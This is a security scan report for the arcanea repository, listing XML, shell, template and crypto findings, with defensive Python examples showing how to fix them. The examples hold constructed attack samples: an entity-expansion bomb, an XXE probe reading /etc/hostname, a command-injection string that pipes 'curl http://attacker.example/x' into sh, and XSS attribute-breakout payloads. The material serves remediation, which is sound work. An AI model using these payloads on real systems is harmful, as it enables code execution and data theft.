Repository: frankxai/arcanea
Commit: 68d9754
Verdict: FAIL
Score: 0
Date: May 22, 2026
| Severity | Rule | Message | File:Line |
|---|---|---|---|
| HIGH | python.lang.security.use-defused-xml.use-defused-xml | The Python documentation recommends using `defusedxml` instead of `xml` because the native Python `xml` library is vulnerable to XML External Entity (XXE) attacks. These attacks can leak confidential data and "XML bombs" can cause denial of service. | frankxai/arcanea/v3-memory-unification-eaa143b9/.claude/skills/docx/ooxml/scripts/validation/redlining.py:32 |
| HIGH | python.lang.security.use-defused-xml.use-defused-xml | The Python documentation recommends using `defusedxml` instead of `xml` because the native Python `xml` library is vulnerable to XML External Entity (XXE) attacks. These attacks can leak confidential data and "XML bombs" can cause denial of service. | frankxai/arcanea/v3-memory-unification-eaa143b9/.claude/skills/docx/ooxml/scripts/validation/redlining.py:84 |
| HIGH | python.lang.security.use-defused-xml.use-defused-xml | The Python documentation recommends using `defusedxml` instead of `xml` because the native Python `xml` library is vulnerable to XML External Entity (XXE) attacks. These attacks can leak confidential data and "XML bombs" can cause denial of service. | frankxai/arcanea/v3-memory-unification-eaa143b9/.claude/skills/external/docx/ooxml/scripts/validation/redlining.py:32 |
| HIGH | python.lang.security.use-defused-xml.use-defused-xml | The Python documentation recommends using `defusedxml` instead of `xml` because the native Python `xml` library is vulnerable to XML External Entity (XXE) attacks. These attacks can leak confidential data and "XML bombs" can cause denial of service. | frankxai/arcanea/v3-memory-unification-eaa143b9/.claude/skills/external/docx/ooxml/scripts/validation/redlining.py:84 |
| HIGH | python.lang.security.use-defused-xml.use-defused-xml | The Python documentation recommends using `defusedxml` instead of `xml` because the native Python `xml` library is vulnerable to XML External Entity (XXE) attacks. These attacks can leak confidential data and "XML bombs" can cause denial of service. | frankxai/arcanea/v3-memory-unification-eaa143b9/.claude/skills/external/mcp-builder/scripts/evaluation.py:13 |
| HIGH | python.lang.security.use-defused-xml.use-defused-xml | The Python documentation recommends using `defusedxml` instead of `xml` because the native Python `xml` library is vulnerable to XML External Entity (XXE) attacks. These attacks can leak confidential data and "XML bombs" can cause denial of service. | frankxai/arcanea/v3-memory-unification-eaa143b9/.claude/skills/external/pptx/ooxml/scripts/validation/redlining.py:32 |
| HIGH | python.lang.security.use-defused-xml.use-defused-xml | The Python documentation recommends using `defusedxml` instead of `xml` because the native Python `xml` library is vulnerable to XML External Entity (XXE) attacks. These attacks can leak confidential data and "XML bombs" can cause denial of service. | frankxai/arcanea/v3-memory-unification-eaa143b9/.claude/skills/external/pptx/ooxml/scripts/validation/redlining.py:84 |
| HIGH | python.lang.security.use-defused-xml.use-defused-xml | The Python documentation recommends using `defusedxml` instead of `xml` because the native Python `xml` library is vulnerable to XML External Entity (XXE) attacks. These attacks can leak confidential data and "XML bombs" can cause denial of service. | frankxai/arcanea/v3-memory-unification-eaa143b9/.claude/skills/pptx/ooxml/scripts/validation/redlining.py:32 |
| HIGH | python.lang.security.use-defused-xml.use-defused-xml | The Python documentation recommends using `defusedxml` instead of `xml` because the native Python `xml` library is vulnerable to XML External Entity (XXE) attacks. These attacks can leak confidential data and "XML bombs" can cause denial of service. | frankxai/arcanea/v3-memory-unification-eaa143b9/.claude/skills/pptx/ooxml/scripts/validation/redlining.py:84 |
| HIGH | python.lang.security.audit.subprocess-shell-true.subprocess-shell-true | Found 'subprocess' function 'Popen' with 'shell=True'. This is dangerous because this call will spawn the command using a shell process. Doing so propagates current shell settings and variables, which makes it much easier for a malicious actor to execute commands. Use 'shell=False' instead. | frankxai/arcanea/v3-memory-unification-eaa143b9/.claude/skills/webapp-testing/scripts/with_server.py:71 |
| MEDIUM | generic.html-templates.security.unquoted-attribute-var.unquoted-attribute-var | Detected an unquoted template variable as an attribute. If unquoted, a malicious actor could inject custom JavaScript handlers. To fix this, add quotes around the template expression, like this: "{{ expr }}". | frankxai/arcanea/v3-memory-unification-eaa143b9/PROMPT_BOOKS_DEMO.html:90 |
| MEDIUM | generic.html-templates.security.unquoted-attribute-var.unquoted-attribute-var | Detected an unquoted template variable as an attribute. If unquoted, a malicious actor could inject custom JavaScript handlers. To fix this, add quotes around the template expression, like this: "{{ expr }}". | frankxai/arcanea/v3-memory-unification-eaa143b9/PROMPT_BOOKS_DEMO.html:90 |
| MEDIUM | generic.html-templates.security.unquoted-attribute-var.unquoted-attribute-var | Detected an unquoted template variable as an attribute. If unquoted, a malicious actor could inject custom JavaScript handlers. To fix this, add quotes around the template expression, like this: "{{ expr }}". | frankxai/arcanea/v3-memory-unification-eaa143b9/PROMPT_BOOKS_DEMO.html:96 |
| MEDIUM | generic.html-templates.security.unquoted-attribute-var.unquoted-attribute-var | Detected an unquoted template variable as an attribute. If unquoted, a malicious actor could inject custom JavaScript handlers. To fix this, add quotes around the template expression, like this: "{{ expr }}". | frankxai/arcanea/v3-memory-unification-eaa143b9/PROMPT_BOOKS_DEMO.html:96 |
| MEDIUM | generic.html-templates.security.unquoted-attribute-var.unquoted-attribute-var | Detected an unquoted template variable as an attribute. If unquoted, a malicious actor could inject custom JavaScript handlers. To fix this, add quotes around the template expression, like this: "{{ expr }}". | frankxai/arcanea/v3-memory-unification-eaa143b9/PROMPT_BOOKS_DEMO.html:109 |
| MEDIUM | generic.html-templates.security.unquoted-attribute-var.unquoted-attribute-var | Detected an unquoted template variable as an attribute. If unquoted, a malicious actor could inject custom JavaScript handlers. To fix this, add quotes around the template expression, like this: "{{ expr }}". | frankxai/arcanea/v3-memory-unification-eaa143b9/PROMPT_BOOKS_DEMO.html:109 |
| MEDIUM | generic.html-templates.security.unquoted-attribute-var.unquoted-attribute-var | Detected an unquoted template variable as an attribute. If unquoted, a malicious actor could inject custom JavaScript handlers. To fix this, add quotes around the template expression, like this: "{{ expr }}". | frankxai/arcanea/v3-memory-unification-eaa143b9/PROMPT_BOOKS_DEMO.html:109 |
| MEDIUM | generic.html-templates.security.unquoted-attribute-var.unquoted-attribute-var | Detected an unquoted template variable as an attribute. If unquoted, a malicious actor could inject custom JavaScript handlers. To fix this, add quotes around the template expression, like this: "{{ expr }}". | frankxai/arcanea/v3-memory-unification-eaa143b9/PROMPT_BOOKS_DEMO.html:136 |
| MEDIUM | generic.html-templates.security.unquoted-attribute-var.unquoted-attribute-var | Detected an unquoted template variable as an attribute. If unquoted, a malicious actor could inject custom JavaScript handlers. To fix this, add quotes around the template expression, like this: "{{ expr }}". | frankxai/arcanea/v3-memory-unification-eaa143b9/PROMPT_BOOKS_DEMO.html:136 |
| MEDIUM | generic.html-templates.security.unquoted-attribute-var.unquoted-attribute-var | Detected an unquoted template variable as an attribute. If unquoted, a malicious actor could inject custom JavaScript handlers. To fix this, add quotes around the template expression, like this: "{{ expr }}". | frankxai/arcanea/v3-memory-unification-eaa143b9/PROMPT_BOOKS_DEMO.html:136 |
| MEDIUM | generic.html-templates.security.unquoted-attribute-var.unquoted-attribute-var | Detected an unquoted template variable as an attribute. If unquoted, a malicious actor could inject custom JavaScript handlers. To fix this, add quotes around the template expression, like this: "{{ expr }}". | frankxai/arcanea/v3-memory-unification-eaa143b9/PROMPT_BOOKS_DEMO.html:142 |
| MEDIUM | generic.html-templates.security.unquoted-attribute-var.unquoted-attribute-var | Detected an unquoted template variable as an attribute. If unquoted, a malicious actor could inject custom JavaScript handlers. To fix this, add quotes around the template expression, like this: "{{ expr }}". | frankxai/arcanea/v3-memory-unification-eaa143b9/PROMPT_BOOKS_DEMO.html:143 |
| MEDIUM | generic.html-templates.security.unquoted-attribute-var.unquoted-attribute-var | Detected an unquoted template variable as an attribute. If unquoted, a malicious actor could inject custom JavaScript handlers. To fix this, add quotes around the template expression, like this: "{{ expr }}". | frankxai/arcanea/v3-memory-unification-eaa143b9/PROMPT_BOOKS_DEMO.html:144 |
| MEDIUM | generic.html-templates.security.unquoted-attribute-var.unquoted-attribute-var | Detected an unquoted template variable as an attribute. If unquoted, a malicious actor could inject custom JavaScript handlers. To fix this, add quotes around the template expression, like this: "{{ expr }}". | frankxai/arcanea/v3-memory-unification-eaa143b9/PROMPT_BOOKS_DEMO.html:145 |
| MEDIUM | generic.html-templates.security.unquoted-attribute-var.unquoted-attribute-var | Detected an unquoted template variable as an attribute. If unquoted, a malicious actor could inject custom JavaScript handlers. To fix this, add quotes around the template expression, like this: "{{ expr }}". | frankxai/arcanea/v3-memory-unification-eaa143b9/PROMPT_BOOKS_DEMO.html:168 |
| MEDIUM | generic.html-templates.security.unquoted-attribute-var.unquoted-attribute-var | Detected an unquoted template variable as an attribute. If unquoted, a malicious actor could inject custom JavaScript handlers. To fix this, add quotes around the template expression, like this: "{{ expr }}". | frankxai/arcanea/v3-memory-unification-eaa143b9/PROMPT_BOOKS_DEMO.html:168 |
| MEDIUM | generic.html-templates.security.unquoted-attribute-var.unquoted-attribute-var | Detected an unquoted template variable as an attribute. If unquoted, a malicious actor could inject custom JavaScript handlers. To fix this, add quotes around the template expression, like this: "{{ expr }}". | frankxai/arcanea/v3-memory-unification-eaa143b9/PROMPT_BOOKS_DEMO.html:168 |
| MEDIUM | generic.html-templates.security.unquoted-attribute-var.unquoted-attribute-var | Detected an unquoted template variable as an attribute. If unquoted, a malicious actor could inject custom JavaScript handlers. To fix this, add quotes around the template expression, like this: "{{ expr }}". | frankxai/arcanea/v3-memory-unification-eaa143b9/PROMPT_BOOKS_DEMO.html:174 |
| MEDIUM | generic.html-templates.security.unquoted-attribute-var.unquoted-attribute-var | Detected an unquoted template variable as an attribute. If unquoted, a malicious actor could inject custom JavaScript handlers. To fix this, add quotes around the template expression, like this: "{{ expr }}". | frankxai/arcanea/v3-memory-unification-eaa143b9/PROMPT_BOOKS_DEMO.html:175 |
| MEDIUM | generic.html-templates.security.unquoted-attribute-var.unquoted-attribute-var | Detected an unquoted template variable as an attribute. If unquoted, a malicious actor could inject custom JavaScript handlers. To fix this, add quotes around the template expression, like this: "{{ expr }}". | frankxai/arcanea/v3-memory-unification-eaa143b9/PROMPT_BOOKS_DEMO.html:176 |
| MEDIUM | generic.html-templates.security.unquoted-attribute-var.unquoted-attribute-var | Detected an unquoted template variable as an attribute. If unquoted, a malicious actor could inject custom JavaScript handlers. To fix this, add quotes around the template expression, like this: "{{ expr }}". | frankxai/arcanea/v3-memory-unification-eaa143b9/PROMPT_BOOKS_DEMO.html:198 |
| MEDIUM | generic.html-templates.security.unquoted-attribute-var.unquoted-attribute-var | Detected an unquoted template variable as an attribute. If unquoted, a malicious actor could inject custom JavaScript handlers. To fix this, add quotes around the template expression, like this: "{{ expr }}". | frankxai/arcanea/v3-memory-unification-eaa143b9/PROMPT_BOOKS_DEMO.html:198 |
| MEDIUM | generic.html-templates.security.unquoted-attribute-var.unquoted-attribute-var | Detected an unquoted template variable as an attribute. If unquoted, a malicious actor could inject custom JavaScript handlers. To fix this, add quotes around the template expression, like this: "{{ expr }}". | frankxai/arcanea/v3-memory-unification-eaa143b9/PROMPT_BOOKS_DEMO.html:198 |
| MEDIUM | generic.html-templates.security.unquoted-attribute-var.unquoted-attribute-var | Detected an unquoted template variable as an attribute. If unquoted, a malicious actor could inject custom JavaScript handlers. To fix this, add quotes around the template expression, like this: "{{ expr }}". | frankxai/arcanea/v3-memory-unification-eaa143b9/PROMPT_BOOKS_DEMO.html:204 |
| MEDIUM | generic.html-templates.security.unquoted-attribute-var.unquoted-attribute-var | Detected an unquoted template variable as an attribute. If unquoted, a malicious actor could inject custom JavaScript handlers. To fix this, add quotes around the template expression, like this: "{{ expr }}". | frankxai/arcanea/v3-memory-unification-eaa143b9/PROMPT_BOOKS_DEMO.html:205 |
| MEDIUM | generic.html-templates.security.unquoted-attribute-var.unquoted-attribute-var | Detected an unquoted template variable as an attribute. If unquoted, a malicious actor could inject custom JavaScript handlers. To fix this, add quotes around the template expression, like this: "{{ expr }}". | frankxai/arcanea/v3-memory-unification-eaa143b9/PROMPT_BOOKS_DEMO.html:206 |
| MEDIUM | generic.html-templates.security.unquoted-attribute-var.unquoted-attribute-var | Detected an unquoted template variable as an attribute. If unquoted, a malicious actor could inject custom JavaScript handlers. To fix this, add quotes around the template expression, like this: "{{ expr }}". | frankxai/arcanea/v3-memory-unification-eaa143b9/PROMPT_BOOKS_DEMO.html:230 |
| MEDIUM | generic.html-templates.security.unquoted-attribute-var.unquoted-attribute-var | Detected an unquoted template variable as an attribute. If unquoted, a malicious actor could inject custom JavaScript handlers. To fix this, add quotes around the template expression, like this: "{{ expr }}". | frankxai/arcanea/v3-memory-unification-eaa143b9/PROMPT_BOOKS_DEMO.html:231 |
| MEDIUM | generic.html-templates.security.unquoted-attribute-var.unquoted-attribute-var | Detected an unquoted template variable as an attribute. If unquoted, a malicious actor could inject custom JavaScript handlers. To fix this, add quotes around the template expression, like this: "{{ expr }}". | frankxai/arcanea/v3-memory-unification-eaa143b9/PROMPT_BOOKS_DEMO.html:232 |
| MEDIUM | generic.html-templates.security.unquoted-attribute-var.unquoted-attribute-var | Detected an unquoted template variable as an attribute. If unquoted, a malicious actor could inject custom JavaScript handlers. To fix this, add quotes around the template expression, like this: "{{ expr }}". | frankxai/arcanea/v3-memory-unification-eaa143b9/PROMPT_BOOKS_DEMO.html:237 |
| MEDIUM | generic.html-templates.security.unquoted-attribute-var.unquoted-attribute-var | Detected an unquoted template variable as an attribute. If unquoted, a malicious actor could inject custom JavaScript handlers. To fix this, add quotes around the template expression, like this: "{{ expr }}". | frankxai/arcanea/v3-memory-unification-eaa143b9/PROMPT_BOOKS_DEMO.html:238 |
| MEDIUM | generic.html-templates.security.unquoted-attribute-var.unquoted-attribute-var | Detected an unquoted template variable as an attribute. If unquoted, a malicious actor could inject custom JavaScript handlers. To fix this, add quotes around the template expression, like this: "{{ expr }}". | frankxai/arcanea/v3-memory-unification-eaa143b9/PROMPT_BOOKS_DEMO.html:239 |
| MEDIUM | typescript.react.security.audit.react-dangerouslysetinnerhtml.react-dangerouslysetinnerhtml | Detection of dangerouslySetInnerHTML from non-constant definition. This can inadvertently expose users to cross-site scripting (XSS) attacks if this comes from user-provided input. If you have to use dangerouslySetInnerHTML, consider using a sanitization library such as DOMPurify to sanitize your HTML. | frankxai/arcanea/v3-memory-unification-eaa143b9/apps/web/components/prompt-books/editor/MarkdownPreview.tsx:28 |
| HIGH | javascript.node-crypto.security.gcm-no-tag-length.gcm-no-tag-length | The call to 'createDecipheriv' with the Galois Counter Mode (GCM) mode of operation is missing an expected authentication tag length. If the expected authentication tag length is not specified or otherwise checked, the application might be tricked into verifying a shorter-than-expected authentication tag. This can be abused by an attacker to spoof ciphertexts or recover the implicit authentication key of GCM, allowing arbitrary forgeries. | frankxai/arcanea/v3-memory-unification-eaa143b9/packages/auth/src/keystore/encrypted-file.ts:37 |
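The nine `use-defused-xml` findings (redlining.py and evaluation.py) all come down to the same fact: the stdlib parsers accept a DOCTYPE and expand whatever entities it declares. The added example below is not code from the arcanea repository; it is a stand-alone, stdlib-only demonstration. `parse_unsafe` is the flagged pattern, `ET.fromstring` on untrusted input, shown expanding a constructed (deliberately tiny) entity chain. `reject_dtd` is a fail-closed gate built on `xml.parsers.expat` handlers that mirrors what `defusedxml`'s `forbid_dtd=True` does; the recommended fix is still to install `defusedxml` and swap the import, this gate is for environments where adding the dependency is not an option. The sample documents, the `DTDForbidden` exception and all function names are this example's own.

```python
"""Entity expansion in the stdlib xml parsers vs. a fail-closed DTD gate."""
import xml.etree.ElementTree as ET
from xml.parsers import expat

# Constructed sample (not from the repository): a two-level internal entity
# chain. Each level multiplies by 8, so &lol2; expands to 64 copies of "lol".
# The real "billion laughs" payload nests ~10 levels of exactly this shape.
BOMB = """<?xml version="1.0"?>
<!DOCTYPE lolz [
  <!ENTITY lol "lol">
  <!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
  <!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">
]>
<doc>&lol2;</doc>"""

# Constructed XXE probe. CPython's expat does not fetch external entities on
# its own, so ElementTree rejects this with "undefined entity"; parsers that do
# resolve SYSTEM entities would read the file. The gate refuses it either way.
XXE = """<?xml version="1.0"?>
<!DOCTYPE doc [ <!ENTITY xxe SYSTEM "file:///etc/hostname"> ]>
<doc>&xxe;</doc>"""

BENIGN = "<doc>plain text</doc>"


class DTDForbidden(ValueError):
    """Raised when a document carries a DOCTYPE or an entity declaration."""


def parse_unsafe(data: str) -> str:
    """The flagged pattern: xml.etree on untrusted input. Internal entities
    are expanded by expat before ElementTree ever sees the text."""
    return ET.fromstring(data).text or ""


def reject_dtd(data: str) -> None:
    """Walk the document with a bare expat parser and fail on any DTD.

    Same policy as defusedxml.ElementTree.fromstring(forbid_dtd=True):
    a DOCTYPE is never needed for data interchange, so refuse it outright
    instead of trying to reason about which entities are harmless.
    """
    parser = expat.ParserCreate()
    # Never load external parameter entities (the other XXE vector).
    parser.SetParamEntityParsing(expat.XML_PARAM_ENTITY_PARSING_NEVER)

    def on_doctype(name, sysid, pubid, has_internal_subset):
        raise DTDForbidden(f"DOCTYPE {name!r} is not allowed")

    def on_entity(*_decl):
        raise DTDForbidden("entity declarations are not allowed")

    # Exceptions raised inside expat handlers propagate out of Parse().
    parser.StartDoctypeDeclHandler = on_doctype
    parser.EntityDeclHandler = on_entity
    parser.Parse(data, True)


def parse_safe(data: str) -> str:
    """Gate first, then parse with the stdlib as before."""
    reject_dtd(data)
    return ET.fromstring(data).text or ""


def is_accepted(data: str) -> bool:
    """True if the hardened path parses the document, False if it was refused."""
    try:
        parse_safe(data)
    except DTDForbidden:
        return False
    return True


if __name__ == "__main__":
    print("unsafe parse expanded to", len(parse_unsafe(BOMB)), "bytes")
    for label, doc in (("bomb", BOMB), ("xxe", XXE), ("benign", BENIGN)):
        print(label, "accepted" if is_accepted(doc) else "rejected")
```

Two things to check when applying this to the flagged files: `redlining.py` parses OOXML parts pulled out of a .docx/.pptx zip, which is exactly the attacker-supplied input case, and the gate has to run on every part, not only `document.xml`. Expat builds since 2.4 cap entity amplification, but only once output passes a multi-megabyte threshold, so the cap is a backstop, not a substitute for refusing the DTD.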
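For the `subprocess-shell-true` finding in `with_server.py`, the fix is to hand `Popen` an argv list instead of a command string. The added example below is not the repository's code and does not reproduce `with_server.py`; it assumes only that the script takes a dev-server command as a string and starts it. `start_server_unsafe` shows the flagged shape, `start_server` the fixed one, and `echo_argv` runs the tokenised command through a real child process (this Python interpreter) to show that shell metacharacters in a constructed hostile string arrive as ordinary arguments. The hostile command string, `attacker.example` and the function names are this example's own.

```python
"""Launching a dev-server command with an argv list instead of shell=True."""
import json
import shlex
import subprocess
import sys

# Constructed hostile input (not a real command from the repository): a
# legitimate-looking dev-server command with a second command appended.
HOSTILE = "npm run dev -- --port 3000; curl http://attacker.example/x | sh"


def build_argv(command: str) -> list:
    """Tokenise like a POSIX shell would, but never run a shell.

    The result is an argv list: quotes group words, but ';', '|', '&&',
    '$(...)' and redirections stay literal bytes in their tokens.
    """
    argv = shlex.split(command)
    if not argv:
        raise ValueError("empty command")
    return argv


def start_server_unsafe(command: str) -> subprocess.Popen:
    """The flagged pattern. /bin/sh parses the string, so the ';' in HOSTILE
    ends the npm command and runs 'curl ... | sh' as a second pipeline."""
    return subprocess.Popen(command, shell=True)


def start_server(command: str) -> subprocess.Popen:
    """Fixed: no shell. The first token is still the caller's choice of
    executable, so if the command string is not trusted, allowlist argv[0]
    as well; what this change removes is the shell grammar, not the trust."""
    return subprocess.Popen(build_argv(command))


def echo_argv(command: str) -> list:
    """Spawn a real child with the tokenised command as its arguments and
    return what the child saw. Uses this interpreter so it runs anywhere."""
    probe = [
        sys.executable, "-c",
        "import json, sys; print(json.dumps(sys.argv[1:]))",
        *build_argv(command),
    ]
    out = subprocess.run(probe, capture_output=True, text=True, check=True).stdout
    return json.loads(out)


if __name__ == "__main__":
    print("argv:", build_argv(HOSTILE))
    print("child received:", echo_argv(HOSTILE))
```

Run stand-alone, the child reports `'3000;'`, `'curl'`, `'|'` and `'sh'` as plain arguments to `npm`, which is the whole point: the second command never exists as a command. If the server genuinely needs shell features (environment expansion, a pipeline), build them in Python instead of handing a string to `sh`.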
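The 32 `unquoted-attribute-var` findings in `PROMPT_BOOKS_DEMO.html` are one bug repeated: `attr={{ expr }}` with no quotes, so a value containing a space ends the attribute and the rest becomes new attributes, including `on*` event handlers. The added example below is not the repository's markup or code; it uses two constructed Jinja-style fragments and two constructed payloads, renders them with a minimal `{{ name }}` substitution, and uses the stdlib `html.parser` to see which attributes a browser-like tokenizer would actually get. It goes slightly beyond the rule's message by also showing why quoting alone is not enough once the value can contain a `"`: the fix is quotes plus attribute escaping (`html.escape(v, quote=True)`, or the template engine's autoescape). The fragment strings, payloads and function names are this example's own.

```python
"""Unquoted vs. quoted template attributes, checked with an HTML tokenizer."""
import html
import re
from html.parser import HTMLParser

# Constructed template fragments (not the repository's markup).
UNQUOTED = "<div class={{ cls }} data-id={{ item_id }}>"
QUOTED = '<div class="{{ cls }}" data-id="{{ item_id }}">'

# Constructed attacker-controlled values.
PAYLOAD_SPACE = "x onmouseover=alert(1)"      # breaks out of an unquoted attr
PAYLOAD_QUOTE = 'x" onmouseover="alert(1)'    # breaks out of a quoted attr

_VAR = re.compile(r"\{\{\s*(\w+)\s*\}\}")


def substitute(template: str, values: dict, escape: bool) -> str:
    """Render {{ name }} placeholders. escape=False is raw interpolation;
    escape=True applies HTML attribute escaping (", ', <, >, &)."""
    def repl(match):
        value = str(values[match.group(1)])
        return html.escape(value, quote=True) if escape else value
    return _VAR.sub(repl, template)


class _AttrCollector(HTMLParser):
    """Collects (name, value) pairs exactly as the tokenizer splits them."""
    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.attrs = []

    def handle_starttag(self, tag, attrs):
        self.attrs.extend(attrs)


def attributes(markup: str) -> list:
    parser = _AttrCollector()
    parser.feed(markup)
    parser.close()
    return parser.attrs


def event_handlers(markup: str) -> list:
    """Names of on* attributes the tokenizer produced: the XSS sinks."""
    return sorted(name for name, _ in attributes(markup) if name.startswith("on"))


def render_all() -> dict:
    """The four combinations a reviewer wants to compare side by side."""
    cases = {
        "unquoted, escaped, space payload": (UNQUOTED, PAYLOAD_SPACE, True),
        "quoted, raw, space payload": (QUOTED, PAYLOAD_SPACE, False),
        "quoted, raw, quote payload": (QUOTED, PAYLOAD_QUOTE, False),
        "quoted, escaped, quote payload": (QUOTED, PAYLOAD_QUOTE, True),
    }
    return {
        label: event_handlers(substitute(tpl, {"cls": payload, "item_id": 7}, esc))
        for label, (tpl, payload, esc) in cases.items()
    }


if __name__ == "__main__":
    for label, handlers in render_all().items():
        print(f"{label:36s} -> {handlers or 'no handler injected'}")
```

The first case is the one the rule is about: escaping does nothing for an unquoted attribute because a bare space is not an escapable character, so `class=x onmouseover=alert(1)` tokenizes as two attributes. The second case shows quotes containing the space payload, the third shows a `"` in the value defeating quotes alone, and the fourth shows quotes plus escaping keeping the whole payload inside `class`, which is the state the template should be in.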